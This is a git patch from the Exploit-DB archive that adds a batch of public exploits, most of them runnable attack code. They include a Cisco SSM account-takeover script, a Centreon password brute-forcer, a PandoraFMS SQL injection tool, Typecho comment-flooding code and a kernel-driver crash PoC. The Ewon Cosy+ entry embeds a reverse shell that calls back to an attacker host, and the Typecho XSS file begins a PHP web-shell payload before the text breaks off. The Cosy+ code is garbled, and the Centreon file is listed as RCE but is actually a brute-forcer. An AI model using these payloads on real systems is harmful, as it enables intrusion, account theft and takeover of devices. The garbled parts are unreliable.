From 9d3e200bec6e0243cd4bb303aafd791349ad0ad0 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Fri, 11 Apr 2025 00:17:01 +0000
Subject: [PATCH] DB: 2025-04-11

12 changes to exploits/shellcodes/ghdb

Cosy+ firmware 21.2s7 - Command Injection

K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

AquilaCMS 1.409.20 - Remote Command Execution (RCE)

Centron 19.04 - Remote Code Execution (RCE)

CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)

Feng Office 3.11.1.2 - SQL Injection

flatCore 1.5.5 - Arbitrary File Upload

PandoraFMS 7.0NG.772 - SQL Injection
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
---
 exploits/multiple/hardware/52160.py |  53 ++++++
 exploits/multiple/remote/52158.py   |  92 ++++++++++
 exploits/multiple/webapps/52155.py  | 118 +++++++++++++
 exploits/php/webapps/52154.NA       |  29 ++++
 exploits/php/webapps/52156.py       | 101 +++++++++++
 exploits/php/webapps/52157.py       | 136 +++++++++++++++
 exploits/php/webapps/52159.txt      |  24 +++
 exploits/php/webapps/52161.go       | 182 ++++++++++++++++++++
 exploits/php/webapps/52162.go       | 254 ++++++++++++++++++++++++++++
 exploits/php/webapps/52164.py       | 197 +++++++++++++++++++++
 exploits/php/webapps/52165.txt      |  78 +++++++++
 files_exploits.csv                  |  11 ++
 12 files changed, 1275 insertions(+)
 create mode 100755 exploits/multiple/hardware/52160.py
 create mode 100755 exploits/multiple/remote/52158.py
 create mode 100755 exploits/multiple/webapps/52155.py
 create mode 100644 exploits/php/webapps/52154.NA
 create mode 100755 exploits/php/webapps/52156.py
 create mode 100755 exploits/php/webapps/52157.py
 create mode 100644 exploits/php/webapps/52159.txt
 create mode 100755 exploits/php/webapps/52161.go
 create mode 100755 exploits/php/webapps/52162.go
 create mode 100755 exploits/php/webapps/52164.py
 create mode 100644 exploits/php/webapps/52165.txt

diff --git a/exploits/multiple/hardware/52160.py b/exploits/multiple/hardware/52160.py
new file mode 100755
index 000000000..c7547b09a
--- /dev/null
+++ b/exploits/multiple/hardware/52160.py
@@ -0,0 +1,53 @@
+Hey,
+
+Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
+maintenance in industrial environments. The manufacturer describes the
+product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
+VPN connection between the machine (PLC, HMI, or other devices) and the
+remote engineer. The connection happens through Talk2m, a highly secured
+industrial cloud service. The Ewon Cosy+ makes industrial remote access
+easy and secure like never before!" Due to improper neutralization of
+parameters read from a user-controlled configuration file, an authenticated
+attacker is able to inject and execute OS commands on the device.
+
+Vulnerability Details: Authenticated attackers are able to upload a custom
+OpenVPN configuration. This configuration can contain the OpenVPN
+paramaters "--up" and "--down", which execute a specified script or
+executable. Since the process itself runs with the highest privileges
+(root), this allows the device to be completely compromised.
+
+
+PoC:
+# Exploit Title: Ewon Cosy+ Command Injection
+# Google Dork: N/A
+# Date: 2024-8-20
+# Exploit Author: CodeB0ss
+# Contact: t.me/codeb0ss / uncodeboss@gmail.com
+# Version: 21.2s7
+ # Tested on: Windows 11 Home Edition
+ # CVE: CVE-2024-33896
+
+
+import socket
+import subprocess
+import time
+
+def configcreator(file_path):
+ with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
+proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
+$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
+l3st(port): server_socket = socket.socket(socket.AF_INET,
+socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
+server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
+client_socket, _ = server_socket.accept() print(" - --> Recevied") while
+True: data = client_socket.recv(1024) if not data: break
+print(data.decode()) client_socket.close() server_socket.close() if name ==
+"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
+5000 listener_process = subprocess.Popen(['python', '-c', f'from main
+import start_listener; start_listener({port})']) time.sleep(2)
+create_malicious_openvpn_config(config) print(f" - --> config_created
+{config}")
+
+
+GitHub:
+https://github.com/codeb0ss/CVE-2024-33896-PoC
\ No newline at end of file
diff --git a/exploits/multiple/remote/52158.py b/exploits/multiple/remote/52158.py
new file mode 100755
index 000000000..f4aff74c9
--- /dev/null
+++ b/exploits/multiple/remote/52158.py
@@ -0,0 +1,92 @@
+# Title:  K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference
+# Date: 13.08.2024
+# Author: M. Akil Gündoğan
+# Vendor Homepage: https://k7computing.com/
+# Version: < v17.0.2019
+# Tested on: Windows 10 Pro x64
+# CVE ID: CVE-2024-36424
+
+# Vulnerability Description:
+--------------------------------------
+In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.
+
+# Technical details and step by step Proof of Concept's (PoC):
+--------------------------------------
+1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.
+
+2 - Compile the attached PoC code written in C++ as release on VS 2022.
+
+3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.
+
+# Impact:
+--------------------------------------
+An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.
+
+# Advisories:
+--------------------------------------
+K7 Computing recommends that all customers update their products to the corresponding versions shown below:
+
+K7 Ultimate Security (17.0.2019 or Higher)
+
+# Timeline:
+--------------------------------------
+- 16.05.2024 - Vulnerability reported.
+- 05.08.2024 - Vendor has fixed the vulnerability.
+- 13.08.2024 - Released.
+
+# References:
+--------------------------------------
+- Vendor: https://www.k7computing.com
+- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
+- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
+- Repository: https://github.com/secunnix/CVE-2024-36424
+
+# PoC Code (C++):
+-------------------------------------------------------------------------------------------------------------------------
+
+/*
+# Usage: Only compile it and run, boooom :)
+*/
+
+#include <windows.h>
+#include <iostream>
+
+const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
+const DWORD ioCTL = 0x222010;  // IOCTL 0x222010 or 0x222014
+
+int main() {
+    std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
+    HANDLE hDevice = CreateFile(driverDevice.c_str(),
+        GENERIC_READ | GENERIC_WRITE,
+        0,
+        nullptr,
+        OPEN_EXISTING,
+        0,
+        nullptr);
+
+    if (hDevice == INVALID_HANDLE_VALUE) {
+        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
+        return 1;
+    }
+
+    void* inputBuffer = nullptr; // Null input buffer
+    DWORD inputBufferSize = 0;
+
+    DWORD bytesReturned;
+    BOOL result = DeviceIoControl(hDevice,
+        ioCTL,
+        inputBuffer,
+        inputBufferSize,
+        nullptr,
+        0,
+        &bytesReturned,
+        nullptr);
+
+    if (!result) {
+        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
+    }
+
+    CloseHandle(hDevice);
+
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52155.py b/exploits/multiple/webapps/52155.py
new file mode 100755
index 000000000..446f29b82
--- /dev/null
+++ b/exploits/multiple/webapps/52155.py
@@ -0,0 +1,118 @@
+# Exploit Title: Cisco SSM On-Prem; Account Takeover (CVE-2024-20419)
+# Google Dork: N/A
+# Date: 21/07/2024
+# Exploit Author: Mohammed Adel
+# Vendor Homepage: https://www.cisco.com
+# Software Link:
+https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html
+# Version: 8-202206 and earlier
+# Tested on: Kali Linux
+# CVE : CVE-2024-20419
+# Security Advisory:
+https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
+# Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419
+
+
+import requests, sys
+from urllib.parse import unquote
+
+# Suppress SSL warnings
+requests.packages.urllib3.disable_warnings()
+
+Domain = sys.argv[1] # Domain, https://0xpolar.com:8443
+Username = sys.argv[2] # Username, by default its [admin]
+password = "Polar@123456780"
+
+print("[*] Cisco Smart Software Manager On-Prem")
+print("[*] Account Takeover Exploit")
+print("[*] Target: "+Domain)
+print("[*] Username: "+Username)
+print("\n")
+
+print("[*] Getting Necessary Tokens..")
+get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar"
+
+response = requests.get(get_url, verify=False)
+
+def get_cookie_value(headers, cookie_name):
+    cookies = headers.get('Set-Cookie', '').split(',')
+    for cookie in cookies:
+        if cookie_name in cookie:
+            parts = cookie.split(';')
+            for part in parts:
+                if cookie_name in part:
+                    return part.split('=')[1].strip()
+    return None
+
+set_cookie_headers = response.headers.get('Set-Cookie', '')
+
+xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN')
+lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session')
+
+if xsrf_token:
+    xsrf_token = unquote(xsrf_token)
+
+if not lic_engine_session or not xsrf_token:
+    print("Required cookies not found in the response.")
+else:
+    print("[+] lic_engine_session: "+lic_engine_session)
+    print("[+] xsrf_token: "+xsrf_token)
+    print("\n[*] Generating Auth Token")
+    post_url = Domain+"/backend/reset_password/generate_code"
+
+    headers = {
+        'Accept': 'application/json',
+        'Content-Type': 'application/json',
+        'X-Xsrf-Token': xsrf_token,
+        'Sec-Ch-Ua': '',
+        'Sec-Ch-Ua-Mobile': '?0',
+    }
+    cookies = {
+        '_lic_engine_session': lic_engine_session,
+        'XSRF-TOKEN': xsrf_token,
+    }
+
+    payload = {
+        'uid': Username
+    }
+
+    post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False)
+
+    post_response_json = post_response.json()
+    auth_token = post_response_json.get('auth_token')
+
+    if not auth_token:
+        print("auth_token not found in the response.")
+    else:
+        print("[+] Auth Token: "+auth_token)
+        print("\n[*] Setting Up a New Password")
+        final_post_url = Domain+"/backend/reset_password"
+
+        final_headers = {
+            'Accept': 'application/json',
+            'Content-Type': 'application/json',
+            'X-Xsrf-Token': xsrf_token,
+        }
+        final_cookies = {
+            '_lic_engine_session': lic_engine_session,
+            'XSRF-TOKEN': xsrf_token,
+        }
+
+        final_payload = {
+            'uid': Username,
+            'auth_token': auth_token,
+            'password': password,
+            'password_confirmation': password,
+            'common_name': ''
+        }
+
+        final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False)
+        response_text = final_post_response.text
+
+        if "OK" in response_text:
+            print("[+] Password Successfully Changed!")
+            print("[+] Username: "+Username)
+            print("[+] New Password: "+password)
+        else:
+            print("[!] Something Went Wrong")
+            print(response_text)
\ No newline at end of file
diff --git a/exploits/php/webapps/52154.NA b/exploits/php/webapps/52154.NA
new file mode 100644
index 000000000..a03d1e141
--- /dev/null
+++ b/exploits/php/webapps/52154.NA
@@ -0,0 +1,29 @@
+# Exploit Title: Blind SQL Injection - FengOffice
+# Date: 7/2024
+# Exploit Author: Andrey Stoykov
+# Version: 3.11.1.2
+# Tested on: Ubuntu 22.04
+# Blog: http://msecureltd.blogspot.com
+
+
+SQL Injection:
+
+1. Login to application
+2. Click on "Workspaces"
+3. Copy full URL
+4. Paste the HTTP GET request into text file
+5. Set the injection point to be in the "dim" parameter value
+6. Use SQLMap to automate the process
+
+sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim =
+--fingerprint
+
+[...]
+[12:13:03] [INFO] confirming MySQL
+[12:13:04] [INFO] the back-end DBMS is MySQL
+[12:13:04] [INFO] actively fingerprinting MySQL
+[12:13:05] [INFO] executing MySQL comment injection fingerprint
+web application technology: Apache
+back-end DBMS: active fingerprint: MySQL >=3D 5.7
+               comment injection fingerprint: MySQL 5.7.37
+[...]
\ No newline at end of file
diff --git a/exploits/php/webapps/52156.py b/exploits/php/webapps/52156.py
new file mode 100755
index 000000000..40084ad8e
--- /dev/null
+++ b/exploits/php/webapps/52156.py
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+# Tested on Centreon API 19.04.0
+# Centreon 19.04 - Login Password Bruteforcer
+# Written on 6 Nov 2019
+# Referencing API Authentication of the Centreon API document
+# Author: st4rry
+# centbruteon.py
+# Centreon Download Link: https://download.centreon.com/#version-Older
+# Dependencies: sys, requests, argparse, termcolor, os
+
+import sys
+import requests
+import argparse
+from termcolor import colored
+import os
+
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
+    parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
+    parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
+    parser.add_argument('-l', dest='username', help='Specific username')
+    parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
+    parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
+    parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
+    parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
+
+    if len(sys.argv) == 1:
+        parser.print_help(sys.stderr)
+        sys.exit(1)
+
+    args = parser.parse_args()
+
+    protocol = 'https' if args.https else 'http'
+    server = f"{protocol}://{args.host}:{args.port}"
+    user = args.username
+    passfile = args.passwfile.read().splitlines()
+    userfile = args.userfile
+    dirlo = '/centreon/api/index.php?action=authenticate'
+    verify_ssl = not args.insecure
+
+    if args.ca_bundle:
+        verify_ssl = args.ca_bundle
+
+    if user:
+        brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
+    elif userfile:
+        usrwl = userfile.read().splitlines()
+        brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
+    else:
+        print(colored('Something went wrong!', 'red'))
+        sys.exit(1)
+
+def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
+    for password in passfile:
+        data = {'username': user, 'password': password}
+        r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
+
+        try:
+            print('Processing...')
+            print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
+                  colored(' Username: ', 'yellow') + colored(user, 'yellow') +
+                  colored(' Password: ', 'yellow') + colored(password, 'yellow'))
+
+            if r.status_code == 200:
+                print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
+                      colored(' password: ', 'green') + colored(password, 'green') +
+                      colored(' server: ', 'green') + colored(server, 'green'))
+                print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
+                print('\n')
+                break
+            else:
+                print(colored('403 - Unauthenticated!', 'red'))
+        except IndexError:
+            print(colored('Something went wrong', 'red'))
+
+def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
+    for usr in usrwl:
+        for password in passfile:
+            data = {'username': usr, 'password': password}
+            r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
+
+            try:
+                print('Processing...')
+                print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
+                      colored(' Username: ', 'yellow') + colored(usr, 'yellow') +
+                      colored(' Password: ', 'yellow') + colored(password, 'yellow'))
+
+                if r.status_code == 200:
+                    print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') +
+                          colored(' password: ', 'green') + colored(password, 'green') +
+                          colored(' server: ', 'green') + colored(server, 'green'))
+                    print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
+                    print('\n')
+                else:
+                    print(colored('403 - Unauthenticated!', 'red'))
+            except IndexError:
+                print(colored('Something went wrong', 'red'))
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52157.py b/exploits/php/webapps/52157.py
new file mode 100755
index 000000000..7c9b39d0a
--- /dev/null
+++ b/exploits/php/webapps/52157.py
@@ -0,0 +1,136 @@
+# Exploit Title: PandoraFMS console v7.0NG.772 - SQL Injection (Authenticated)
+# Date: 21/11/2023
+# Exploit Author: Osama Yousef
+# Vendor Homepage: https://pandorafms.com/
+# Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz
+# Version: v7.0NG.772
+# Tested on: Linux
+# CVE : CVE-2023-44088
+
+import re, requests, argparse, string, random, base64
+import urllib3
+import html
+
+headers = {
+	'Cache-Control': 'max-age=0',
+	'Origin': '',
+	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
+	'Accept': '*/*',
+	'Referer': ''
+}
+
+def login(session, url, username, password):
+	res = session.get(url)
+	csrf = retrieve_csrftoken(res.text)
+
+	url+= '?login=1'
+	payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}"
+
+	res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'})
+	if 'User is blocked' in res.text:
+		print("Login Failed!")
+		exit(1)
+
+
+def exploit(session, url, imagepath, query):
+	url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data"
+	name = random_id(10)
+	payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query)
+	payload=payload.replace(' ', '\t')
+	files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')}
+
+	# Create a reference to the original _make_request method
+	urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request
+	# Replace the _make_request method with the custom_make_request function
+	urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request
+
+
+	res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'})
+
+	if 'Created successfully' not in res.text:
+		print("Failed to create a visual console!")
+		exit(1)
+
+
+	url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder"
+	res = session.get(url2)
+	x = re.search('(?:<a href=".*">)'+name, res.text)
+	match = x.group()
+	url3 = match.lstrip("<a href=")
+	url3 = url3.split('"')[1]
+	url3 = url3.split("?")[1]
+	url3 = html.unescape(url3)
+
+	url4 = url+ "?" + url3
+
+	res = session.get(url4)
+
+	x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text)
+	match = x.group()
+	output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"')
+	output = output.split('","backgroundImage')[0]
+	print("Query output: {}".format(output))
+
+def retrieve_csrftoken(response):
+	x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden"  value=")[a-zA-Z0-9]*(?:")', response)
+	match = x.group()
+	csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden"  value="').rstrip('"')
+	print("CSRF: {}".format(csrf))
+	return csrf
+
+def random_id(len):
+	chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
+	return ''.join(random.choice(chars) for _ in range(len))
+
+def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw):
+	body = httplib_request_kw['body']
+	if body:
+		body = body.replace(b"%09", b"\t"*3)
+
+	httplib_request_kw['body'] = body
+	return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw)
+
+
+def main():
+	ap = argparse.ArgumentParser()
+	ap.add_argument("-t", "--target", required=True, help="Target URI")
+	ap.add_argument("-u", "--username", required=True, help="Username")
+	ap.add_argument("-p", "--password", required=True, help="Password")
+	ap.add_argument("-i", "--image", required=True, help="Image path")
+	ap.add_argument("-q", "--query", required=True, help="SQL Query to execute")
+	ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)")
+
+	args = vars(ap.parse_args())
+
+	session = requests.Session()
+
+	url = args['target']
+	if 'pandora_console' not in url:
+		if not url.endswith('/'):
+			url += '/'
+		url += 'pandora_console/'
+
+
+
+
+	headers['Origin'] = args['target']
+	headers['Referer'] = args['target']
+	session.headers.update(headers)
+
+	proxies = {}
+	if args['proxy'] is not None:
+		if 'https' in args['proxy']:
+			proxies['https'] = args['proxy']
+		else:
+			proxies['http'] = args['proxy']
+
+	session.proxies.update(proxies)
+
+	login(session, url, args['username'], args['password'])
+
+	exploit(session, url, args['image'], args['query'])
+
+
+
+if __name__=='__main__':
+	main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52159.txt b/exploits/php/webapps/52159.txt
new file mode 100644
index 000000000..33c233680
--- /dev/null
+++ b/exploits/php/webapps/52159.txt
@@ -0,0 +1,24 @@
+# Exploit Title: XSS Vulnerability in Online Railway Reservation System 1.0
+# Date: 2024-08-15
+# Exploit Author: Raj Nandi
+# Vendor Homepage: https://codeastro.com/
+# Software Link:
+https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/
+# Version: 1.0
+# Tested on: Any OS
+# CVE: CVE-2024-7815
+
+## Description:
+A Cross-Site Scripting (XSS) vulnerability exists in [Application
+Name/Version]. This vulnerability allows an attacker to inject and execute
+arbitrary JavaScript code within the context of the user's browser session.
+
+## Proof of Concept (PoC):
+1. Navigate to [vulnerable page or input field].
+2. Input the following payload: `<script>alert(document.cookie)</script>`
+3. Upon execution, the script will trigger and display the user's cookies
+in an alert box.
+
+## Mitigation:
+To prevent this vulnerability, ensure that all user inputs are properly
+sanitized and validated before being reflected back on the webpage.
\ No newline at end of file
diff --git a/exploits/php/webapps/52161.go b/exploits/php/webapps/52161.go
new file mode 100755
index 000000000..3ff4dfaed
--- /dev/null
+++ b/exploits/php/webapps/52161.go
@@ -0,0 +1,182 @@
+// Exploit Title: Typecho <= 1.3.0 Race Condition
+// Google Dork: intext:"Powered by Typecho" inurl:/index.php
+// Date: 18/08/2024
+// Exploit Author: Michele 'cyberaz0r' Di Bonaventura
+// Vendor Homepage: https://typecho.org
+// Software Link: https://github.com/typecho/typecho
+// Version: 1.3.0
+// Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
+// CVE: CVE-2024-35539
+
+// For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
+
+package main
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"os"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	"github.com/robertkrimen/otto"
+)
+
+var (
+	c                    int32 = 0
+	commentsPostInterval int64 = 60
+	maxThreads           int   = 1000
+	wg                   sync.WaitGroup
+	userAgent            string       = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
+	client               *http.Client = &http.Client{
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
+			return http.ErrUseLastResponse
+		},
+	}
+)
+
+func getJSFunction(u string) string {
+	req, err := http.NewRequest("GET", u, nil)
+	if err != nil {
+		fmt.Println("[X] Error creating initial request:", err)
+		return ""
+	}
+
+	req.Header.Set("User-Agent", userAgent)
+	resp, err := client.Do(req)
+	if err != nil {
+		fmt.Println("[X] Error sending initial request:", err)
+		return ""
+	}
+
+	buf := new(bytes.Buffer)
+	buf.ReadFrom(resp.Body)
+	body := buf.String()
+
+	if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") {
+		fmt.Println("[X] Error finding JavaScript function")
+		return ""
+	}
+
+	jsFunction := strings.Split(body, "input.value = (")[1]
+	jsFunction = strings.Split(jsFunction, ")();;")[0]
+
+	return jsFunction
+}
+
+func executeJavaScript(jsFunctionName string, jsFunctionBody string) string {
+	vm := otto.New()
+
+	_, err := vm.Run(jsFunctionBody)
+	if err != nil {
+		fmt.Println("[X] Error executing JavaScript function:", err)
+		return ""
+	}
+
+	result, err := vm.Call(jsFunctionName, nil)
+	if err != nil {
+		fmt.Println("[X] Error calling JavaScript function:", err)
+		return ""
+	}
+
+	returnValue, err := result.ToString()
+	if err != nil {
+		fmt.Println("[X] Error converting JavaScript result to string:", err)
+		return ""
+	}
+
+	return returnValue
+}
+
+func spamComments(u string, formToken string) {
+	timestamp := time.Now().Unix()
+	for {
+		i := 0
+
+		for time.Now().Unix() < timestamp-1 {
+			time.Sleep(250 * time.Millisecond)
+			fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds)    ", timestamp-time.Now().Unix()-1)
+		}
+
+		fmt.Printf("\n")
+		for time.Now().Unix() < timestamp+2 {
+			if i < maxThreads {
+				wg.Add(1)
+				go spamRequest(u, formToken, i)
+				i++
+			}
+		}
+
+		wg.Wait()
+		fmt.Printf("\n[+] Successfully spammed %d comments\n", c)
+		timestamp = time.Now().Unix() + commentsPostInterval
+	}
+}
+
+func spamRequest(u string, formToken string, i int) {
+	fmt.Printf("\r[*] Spamming comment request %d    ", i)
+
+	defer wg.Done()
+
+	formData := url.Values{}
+	formData.Set("_", formToken)
+	formData.Set("author", fmt.Sprintf("user_%d", i))
+	formData.Set("mail", fmt.Sprintf("user%d@test.example", i))
+	formData.Set("text", fmt.Sprintf("Hello from user_%d", i))
+
+	req, err := http.NewRequest("POST", u+"comment", nil)
+	if err != nil {
+		return
+	}
+
+	req.Header.Set("Referer", u)
+	req.Header.Set("User-Agent", userAgent)
+	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
+	req.Body = io.NopCloser(strings.NewReader(formData.Encode()))
+
+	resp, err := client.Do(req)
+	if err != nil {
+		return
+	}
+
+	if resp.StatusCode == 302 {
+		atomic.AddInt32(&c, 1)
+	}
+
+	defer resp.Body.Close()
+}
+
+func main() {
+	if len(os.Args) != 2 {
+		fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>")
+		return
+	}
+
+	fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r")
+
+	targetUrl := os.Args[1]
+	fmt.Println("[+] Spam target:", targetUrl)
+
+	fmt.Println("[*] Getting JavaScript function to calculate form token...")
+	jsFunction := getJSFunction(targetUrl)
+	if jsFunction == "" {
+		fmt.Println("[-] Could not get JavaScript function, exiting...")
+		return
+	}
+
+	fmt.Println("[*] Evaluating JavaScript function to calculate form token...")
+	formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1))
+	if formToken == "" {
+		fmt.Println("[-] Could not get form token, exiting...")
+		return
+	}
+
+	fmt.Printf("[+] Form token: %s", formToken)
+	spamComments(targetUrl, formToken)
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/52162.go b/exploits/php/webapps/52162.go
new file mode 100755
index 000000000..0ebfbb166
--- /dev/null
+++ b/exploits/php/webapps/52162.go
@@ -0,0 +1,254 @@
+// Exploit Title: Typecho <= 1.3.0 Stored Cross-Site Scripting (XSS)
+// Google Dork: intext:"Powered by Typecho" inurl:/index.php
+// Date: 18/08/2024
+// Exploit Author: Michele 'cyberaz0r' Di Bonaventura
+// Vendor Homepage: https://typecho.org
+// Software Link: https://github.com/typecho/typecho
+// Version: 1.3.0
+// Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
+// CVE: CVE-2024-35540
+
+// For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
+
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"crypto/rand"
+	"crypto/sha256"
+	"encoding/base64"
+	"fmt"
+	"net/http"
+	"net/url"
+	"os"
+	"strings"
+	"time"
+)
+
+var (
+	postTitle string       = "Reflected XSS PoC"
+	postText  string       = "Hey admin! Look at the draft of this blog post, can I publish it?"
+	userAgent string       = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
+	client    *http.Client = &http.Client{
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
+			return http.ErrUseLastResponse
+		},
+	}
+)
+
+func getEditUrl(u string, cookies string) string {
+	req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil)
+	if err != nil {
+		fmt.Println("[X] Error creating initial request:", err)
+		return ""
+	}
+
+	req.Header.Set("Cookie", cookies)
+	req.Header.Set("User-Agent", userAgent)
+
+	resp, err := client.Do(req)
+	if err != nil {
+		fmt.Println("[X] Error sending initial request:", err)
+		return ""
+	}
+
+	buf := new(bytes.Buffer)
+	buf.ReadFrom(resp.Body)
+	body := buf.String()
+
+	if !strings.Contains(body, "<form action=\"") {
+		fmt.Println("[X] Error finding post edit URL")
+		return ""
+	}
+
+	editUrl := strings.Split(body, "<form action=\"")[1]
+	editUrl = strings.Split(editUrl, "\"")[0]
+
+	return editUrl
+}
+
+func generateRandomBytes() string {
+	bytes := make([]byte, 64)
+	rand.Read(bytes)
+	return fmt.Sprintf("%x", sha256.Sum256(bytes))
+}
+
+func getJsCode(password string) string {
+	phpPayload := `
+		header("X-Random-Token: " . md5(uniqid()));
+		if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") {
+			if (isset($_POST["action"])) {
+				system($_POST["action"]);
+				exit;
+			}
+		}
+	`
